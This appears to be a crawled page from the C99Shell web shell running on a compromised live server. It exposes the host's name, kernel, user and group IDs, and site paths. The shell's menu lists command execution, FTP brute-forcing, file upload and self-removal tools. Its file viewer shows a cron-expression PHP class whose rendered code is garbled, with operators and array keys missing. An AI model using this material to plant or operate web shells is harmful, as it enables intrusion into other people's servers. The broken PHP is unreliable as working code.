!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/dragonmantank/cron-expression/src/Cron/   drwxr-xr-x
Free 28.51 GB of 117.98 GB (24.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MonthField.php (1.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Cron;

use 
DateTimeInterface;

/**
 * Month field.  Allows: * , / -.
 */
class MonthField extends AbstractField
{
    
/**
     * {@inheritdoc}
     */
    
protected $rangeStart 1;

    
/**
     * {@inheritdoc}
     */
    
protected $rangeEnd 12;

    
/**
     * {@inheritdoc}
     */
    
protected $literals = [=> 'JAN'=> 'FEB'=> 'MAR'=> 'APR'=> 'MAY'=> 'JUN'=> 'JUL',
        
=> 'AUG'=> 'SEP'10 => 'OCT'11 => 'NOV'12 => 'DEC', ];

    
/**
     * {@inheritdoc}
     */
    
public function isSatisfiedBy(DateTimeInterface $date$valuebool $invert): bool
    
{
        if (
$value === '?') {
            return 
true;
        }

        
$value $this->convertLiterals($value);

        return 
$this->isSatisfied((int) $date->format('m'), $value);
    }

    
/**
     * @inheritDoc
     *
     * @param \DateTime|\DateTimeImmutable $date
     */
    
public function increment(DateTimeInterface &$date$invert false$parts null): FieldInterface
    
{
        if (! 
$invert) {
            
$date $date->modify('first day of next month');
            
$date $date->setTime(00);
        } else {
            
$date $date->modify('last day of previous month');
            
$date $date->setTime(2359);
        }

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--